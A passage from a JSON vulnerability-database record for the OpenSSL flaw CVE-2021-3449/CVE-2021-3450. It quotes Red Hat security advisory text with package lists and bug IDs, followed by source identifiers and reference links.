RHEV 4 (build requirements) - noarch, x86_64\nRed Hat Virtualization 4 Hypervisor for RHEL 8 - noarch, x86_64\n\n3. Description:\n\nThe redhat-virtualization-host packages provide the Red Hat Virtualization\nHost. These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are\ninstalled using a special build of Red Hat Enterprise Linux with only the\npackages required to host virtual machines. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. \n\nThe ovirt-node-ng packages provide the Red Hat Virtualization Host. These\npackages include redhat-release-virtualization-host, ovirt-node, and\nrhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a\nspecial build of Red Hat Enterprise Linux with only the packages required\nto host virtual machines. RHVH features a Cockpit user interface for\nmonitoring the host\u0027s resources and performing administrative tasks. \n\nChanges to the redhat-release-virtualization-host component:\n\n* Previously, the redhat-support-tool was missing from the RHV-H 4.4\npackage. \nIn this release, the redhat-support-tool has been added. (BZ#1928607)\n\nSecurity Fix(es):\n\n* openssl: NULL pointer dereference in signature_algorithms processing\n(CVE-2021-3449)\n\n* openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT\n(CVE-2021-3450)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891\n\nThe system must be rebooted for this update to take effect. For the update\nto take effect, all services linked to the glibc library must be restarted,\nor the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1892573 - RHVH 4.4.2 fails to boot from SAN when using UUID for /boot partition\n1895832 - RHVH 4.4.3: No response when clicking button \"Help\" in Anaconda GUI\n1907306 - \"sysstat\" doesn\u0027t collect data for upgraded RHVH\n1907358 - In FIPS mode, RHVH cannot enter the new layer after upgrade\n1907746 - RHVH cannot enter the new layer after upgrade testing with STIG profile selected. \n1918207 - RHVH upgrade to 4.4.5-1 will fail due to FileNotFoundError\n1927395 - RHVH, protecting key packages from being removed. \n1928607 - redhat-support-tool is missing from latest RHV-H 4.4\n1940845 - Include updated gluster-ansible-features in RHV-H 4.4.5\n1941547 - CVE-2021-3450 openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT\n1941554 - CVE-2021-3449 openssl: NULL pointer dereference in signature_algorithms processing\n1942040 - Rebase RHV-H 4.4.5 on RHEL-AV 8.3.1 Async\n1942498 - Rebase RHV-H 4.4.5 on RHEL-8.3.1.3\n\n6. Package List:\n\nRed Hat Virtualization 4 Hypervisor for RHEL 8:\n\nSource:\nboost-1.66.0-10.el8.src.rpm\ndyninst-10.1.0-4.el8.src.rpm\ngcc-8.3.1-5.1.el8.src.rpm\nisl-0.16.1-6.el8.src.rpm\nlibmpc-1.0.2-9.el8.src.rpm\nlibxcrypt-4.1.1-4.el8.src.rpm\nmake-4.2.1-10.el8.src.rpm\nredhat-virtualization-host-4.4.5-20210330.0.el8_3.src.rpm\ntbb-2018.2-9.el8.src.rpm\nzip-3.0-23.el8.src.rpm\n\nnoarch:\nredhat-virtualization-host-image-update-4.4.5-20210330.0.el8_3.noarch.rpm\nvim-filesystem-8.0.1763-15.el8.noarch.rpm\n\nx86_64:\nboost-atomic-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-chrono-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-container-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-context-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-coroutine-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-date-time-1.66.0-10.el8.x86_64.rpm\nboost-date-time-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-debugsource-1.66.0-10.el8.x86_64.rpm\nboost-doctools-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-fiber-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-filesystem-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-graph-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-graph-mpich-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-graph-openmpi-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-iostreams-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-locale-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-log-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-math-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-mpich-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-mpich-python3-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-numpy3-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-openmpi-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-openmpi-python3-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-program-options-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-python3-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-random-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-regex-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-serialization-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-signals-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-stacktrace-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-system-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-test-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-thread-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-timer-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-type_erasure-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-wave-debuginfo-1.66.0-10.el8.x86_64.rpm\nbpftool-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm\ncompat-libmpc-debuginfo-1.0.2-9.el8.x86_64.rpm\ncpp-8.3.1-5.1.el8.x86_64.rpm\ncpp-debuginfo-8.3.1-5.1.el8.x86_64.rpm\ndyninst-10.1.0-4.el8.x86_64.rpm\ndyninst-debuginfo-10.1.0-4.el8.x86_64.rpm\ndyninst-debugsource-10.1.0-4.el8.x86_64.rpm\ndyninst-devel-debuginfo-10.1.0-4.el8.x86_64.rpm\ndyninst-testsuite-debuginfo-10.1.0-4.el8.x86_64.rpm\ngcc-8.3.1-5.1.el8.x86_64.rpm\ngcc-c++-debuginfo-8.3.1-5.1.el8.x86_64.rpm\ngcc-debuginfo-8.3.1-5.1.el8.x86_64.rpm\ngcc-debugsource-8.3.1-5.1.el8.x86_64.rpm\ngcc-gdb-plugin-debuginfo-8.3.1-5.1.el8.x86_64.rpm\ngcc-gfortran-debuginfo-8.3.1-5.1.el8.x86_64.rpm\ngcc-offload-nvptx-debuginfo-8.3.1-5.1.el8.x86_64.rpm\ngcc-plugin-devel-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nglibc-debuginfo-2.28-127.el8_3.2.x86_64.rpm\nglibc-debuginfo-common-2.28-127.el8_3.2.x86_64.rpm\nglibc-devel-2.28-127.el8_3.2.x86_64.rpm\nglibc-headers-2.28-127.el8_3.2.x86_64.rpm\nisl-0.16.1-6.el8.x86_64.rpm\nisl-debugsource-0.16.1-6.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm\nkernel-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-240.22.1.el8_3.x86_64.rpm\nkernel-devel-4.18.0-240.22.1.el8_3.x86_64.rpm\nkernel-headers-4.18.0-240.22.1.el8_3.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm\nlibasan-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibatomic-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibgcc-8.3.1-5.1.el8.x86_64.rpm\nlibgcc-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibgfortran-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibgomp-8.3.1-5.1.el8.x86_64.rpm\nlibgomp-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibgomp-offload-nvptx-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibitm-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nliblsan-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibmpc-1.0.2-9.el8.x86_64.rpm\nlibmpc-debuginfo-1.0.2-9.el8.x86_64.rpm\nlibmpc-debugsource-1.0.2-9.el8.x86_64.rpm\nlibquadmath-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibstdc++-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibtsan-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibubsan-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibxcrypt-debugsource-4.1.1-4.el8.x86_64.rpm\nlibxcrypt-devel-4.1.1-4.el8.x86_64.rpm\nmake-4.2.1-10.el8.x86_64.rpm\nmake-debugsource-4.2.1-10.el8.x86_64.rpm\nperf-4.18.0-240.22.1.el8_3.x86_64.rpm\nperf-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm\npython3-perf-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm\ntbb-2018.2-9.el8.x86_64.rpm\ntbb-debugsource-2018.2-9.el8.x86_64.rpm\nvim-X11-debuginfo-8.0.1763-15.el8.x86_64.rpm\nvim-common-8.0.1763-15.el8.x86_64.rpm\nvim-common-debuginfo-8.0.1763-15.el8.x86_64.rpm\nvim-debuginfo-8.0.1763-15.el8.x86_64.rpm\nvim-debugsource-8.0.1763-15.el8.x86_64.rpm\nvim-enhanced-8.0.1763-15.el8.x86_64.rpm\nvim-enhanced-debuginfo-8.0.1763-15.el8.x86_64.rpm\nvim-minimal-debuginfo-8.0.1763-15.el8.x86_64.rpm\nzip-3.0-23.el8.x86_64.rpm\nzip-debugsource-3.0-23.el8.x86_64.rpm\n\nRHEL 8-based RHEV-H for RHEV 4 (build requirements):\n\nSource:\nimgbased-1.2.18-0.1.el8ev.src.rpm\nredhat-release-virtualization-host-4.4.5-4.el8ev.src.rpm\nscap-security-guide-0.1.50-1.el8ev.src.rpm\n\nnoarch:\nimgbased-1.2.18-0.1.el8ev.noarch.rpm\npython3-imgbased-1.2.18-0.1.el8ev.noarch.rpm\nredhat-virtualization-host-image-update-placeholder-4.4.5-4.el8ev.noarch.rpm\nscap-security-guide-rhv-0.1.50-1.el8ev.noarch.rpm\n\nx86_64:\nredhat-release-virtualization-host-4.4.5-4.el8ev.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-3449\nhttps://access.redhat.com/security/cve/CVE-2021-3450\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYHbW2dzjgjWX9erEAQhrvQ//VGyhTZ32NVUTnNMVVaHZyN5HL2Gt7CRG\nsOA8Z7hKGGPq8nHZEeTtk2KBpxaLLzVHxKmILtnsRTlRqq2s4BSgd9j7YhNvTlZe\nkK6Y3ovcWBKdqqui2ezZz9WFmKbQ5yjJImMo+TfyAS0D1RLwxNyKzDyYDCIZuO03\n1AcV0ILWSVpaEKRrjOX6S0VnmMR0hqf4JmgLk8/ePv3wp+vd5voeIymWDPy6KrPW\n0WS6NLHHNGucnzKXiRglwLeWKCYdQ+MCewkLKch/4eQPI28+N72dEgI9nhbZMind\nkhmKrnPDt5CIS9aWNmm+B/pWHZB1kEFt6hls/+xn2aXvrHxGgj6aTyl1peMhxYwA\nbvlQx+p1jOOREgtvnQHwemAVEuZByW4QFWqdZn/BIqbImTjxlawqYRwHjWpOvMfo\nZ6l7kiG86TsEWj/QJGAoRvwmqer7pWrttVeUivFBNmUhgZ8lEIMT3MkULY8VBJp+\nPrwbQwfpMn38PZbnl/DT3A0aSgZ1Q1uQZooW8B6zBKYUdgwTU8impaBaKfyM9QRq\nhCqHX42S4b/tNZhy64hlfkv24kei4RqgI4sGVeDfSA/tWzdgvBghQ1pOEhlPY4MH\njINgKocRD1f08X0meBmqk4IuoZdWkUrGgvprmT81At4ZF3omaQ1amKj1HhXpmJVa\nda5fQnRzZzc=\n=xbcY\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Summary:\n\nRed Hat JBoss Core Services Pack Apache Server 2.4.37 Service Pack 7 zip\nrelease for RHEL 7, RHEL 8 and Microsoft Windows is available. This software, such as Apache HTTP Server, is\ncommon to multiple JBoss middleware products, and is packaged under Red Hat\nJBoss Core Services to allow for faster distribution of updates, and for a\nmore consistent update experience. \n\nThis release adds the new Apache HTTP Server 2.4.37 Service Pack 7 packages\nthat are part of the JBoss Core Services offering. \n\nThis release serves as a replacement for Red Hat JBoss Core Services Pack\nApache Server 2.4.37 Service Pack 6 and includes bug fixes and\nenhancements. Refer to the Release Notes for information on the most\nsignificant bug fixes and enhancements included in this release. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nThe References section of this erratum contains a download link for the\nupdate. You must be logged in to download the update. \n\nSecurity Fix(es):\n\n* golang: crypto/tls: certificate of wrong type is causing TLS client to\npanic\n(CVE-2021-34558)\n* golang: net: lookup functions may return invalid host names\n(CVE-2021-33195)\n* golang: net/http/httputil: ReverseProxy forwards connection headers if\nfirst one is empty (CVE-2021-33197)\n* golang: match/big.Rat: may cause a panic or an unrecoverable fatal error\nif passed inputs with very large exponents (CVE-2021-33198)\n* golang: encoding/xml: infinite loop when using xml.NewTokenDecoder with a\ncustom TokenReader (CVE-2021-27918)\n* golang: net/http: panic in ReadRequest and ReadResponse when reading a\nvery large header (CVE-2021-31525)\n* golang: archive/zip: malformed archive may cause panic or memory\nexhaustion (CVE-2021-33196)\n\nIt was found that the CVE-2021-27918, CVE-2021-31525 and CVE-2021-33196\nhave been incorrectly mentioned as fixed in RHSA for Serverless client kn\n1.16.0. Bugs fixed (https://bugzilla.redhat.com/):\n\n1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic\n1983651 - Release of OpenShift Serverless Serving 1.17.0\n1983654 - Release of OpenShift Serverless Eventing 1.17.0\n1989564 - CVE-2021-33195 golang: net: lookup functions may return invalid host names\n1989570 - CVE-2021-33197 golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty\n1989575 - CVE-2021-33198 golang: math/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents\n1992955 - CVE-2021-3703 serverless: incomplete fix for CVE-2021-27918 / CVE-2021-31525 / CVE-2021-33196\n\n5",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-3450"
},
{
"db": "VULHUB",
"id": "VHN-388430"
},
{
"db": "PACKETSTORM",
"id": "162694"
},
{
"db": "PACKETSTORM",
"id": "162172"
},
{
"db": "PACKETSTORM",
"id": "162307"
},
{
"db": "PACKETSTORM",
"id": "162197"
},
{
"db": "PACKETSTORM",
"id": "164192"
}
],
"trust": 1.44
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-3450",
"trust": 2.2
},
{
"db": "SIEMENS",
"id": "SSA-389290",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/03/28/3",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/03/27/2",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/03/28/4",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/03/27/1",
"trust": 1.7
},
{
"db": "TENABLE",
"id": "TNS-2021-05",
"trust": 1.7
},
{
"db": "TENABLE",
"id": "TNS-2021-09",
"trust": 1.7
},
{
"db": "TENABLE",
"id": "TNS-2021-08",
"trust": 1.7
},
{
"db": "PULSESECURE",
"id": "SA44845",
"trust": 1.7
},
{
"db": "MCAFEE",
"id": "SB10356",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "162172",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "162307",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "162337",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "162151",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "162196",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "162383",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "163257",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "162013",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "162041",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "162699",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2021.1406",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2160",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1191",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2259.2",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1618",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3141",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1378",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4083",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1065",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2228",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1445",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1127",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2408",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1293",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1727",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1225",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1025",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2657",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1082.2",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1075",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1757",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4058",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021051226",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021050609",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022041940",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021041615",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021101938",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021062703",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021062315",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021042114",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021101261",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021072056",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021071904",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060315",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021072765",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021042502",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021052216",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021050615",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031104",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022011038",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "161984",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1456",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "162197",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "162189",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "162201",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "162200",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "162183",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-388430",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "162694",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164192",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-388430"
},
{
"db": "PACKETSTORM",
"id": "162694"
},
{
"db": "PACKETSTORM",
"id": "162172"
},
{
"db": "PACKETSTORM",
"id": "162307"
},
{
"db": "PACKETSTORM",
"id": "162197"
},
{
"db": "PACKETSTORM",
"id": "164192"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1456"
},
{
"db": "NVD",
"id": "CVE-2021-3450"
}
]
},
"id": "VAR-202103-1463",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-388430"
}
],
"trust": 0.430409355
},
"last_update_date": "2024-09-19T21:03:53.297000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "OpenSSL Repair measures for trust management problem vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=146028"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202103-1456"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-295",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-388430"
},
{
"db": "NVD",
"id": "CVE-2021-3450"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-openssl-2021-ghy28djd"
},
{
"trust": 2.3,
"url": "https://www.oracle.com/security-alerts/cpuapr2021.html"
},
{
"trust": 2.3,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 2.3,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.7,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
},
{
"trust": 1.7,
"url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa44845"
},
{
"trust": 1.7,
"url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2021-0013"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20210326-0006/"
},
{
"trust": 1.7,
"url": "https://www.openssl.org/news/secadv/20210325.txt"
},
{
"trust": 1.7,
"url": "https://www.tenable.com/security/tns-2021-05"
},
{
"trust": 1.7,
"url": "https://www.tenable.com/security/tns-2021-08"
},
{
"trust": 1.7,
"url": "https://www.tenable.com/security/tns-2021-09"
},
{
"trust": 1.7,
"url": "https://security.gentoo.org/glsa/202103-03"
},
{
"trust": 1.7,
"url": "https://mta.openssl.org/pipermail/openssl-announce/2021-march/000198.html"
},
{
"trust": 1.7,
"url": "https://security.freebsd.org/advisories/freebsd-sa-21:07.openssl.asc"
},
{
"trust": 1.7,
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/03/27/1"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/03/27/2"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/03/28/3"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/03/28/4"
},
{
"trust": 1.6,
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10356"
},
{
"trust": 1.0,
"url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ccbfllvqvilivgzmbjl3ixzgkwqisynp/"
},
{
"trust": 0.7,
"url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ccbfllvqvilivgzmbjl3ixzgkwqisynp/"
},
{
"trust": 0.6,
"url": "https://www.debian.org/security/2021/dsa-4875"
},
{
"trust": 0.6,
"url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-integration-bus-and-ibm-app-connect-enterprise-v11-are-affected-by-vulnerabilities-in-node-js-cve-2021-3450-cve-2021-3449-3/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-update-available-for-openssl-vulnerabilities-affecting-ibm-watson-speech-services-1-2-1/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6486347"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021052216"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-openssl-affect-ibm-integration-bus-and-ibm-app-connect-enterprise-v11-cve-2021-3449-cve-2021-3450-2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2657"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1127"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1445"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1727"
},
{
"trust": 0.6,
"url": "https://msrc.microsoft.com/update-guide/vulnerability/cve-2021-3450"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-system-systems-are-affected-by-vulnerabilities-in-openssl/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1406"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162172/red-hat-security-advisory-2021-1189-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-xstream-java-openssl-websphere-application-server-liberty-and-node-js-affect-ibm-spectrum-control/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-openssl-for-ibm-i-is-affected-by-cve-2021-3449-and-cve-2021-3450/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1378"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162041/gentoo-linux-security-advisory-202103-03.html"
},
{
"trust": 0.6,
"url": "https://www.oracle.com/security-alerts/cpujul2021.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1293"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4083"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6520674"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1618"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2228"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-cloud-pak-for-security-has-several-security-vulnerabilities-addressed-in-the-latest-version/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162307/red-hat-security-advisory-2021-1338-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162699/red-hat-security-advisory-2021-2041-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6520474"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072056"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1065"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021042502"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162013/red-hat-security-advisory-2021-1024-01.html"
},
{
"trust": 0.6,
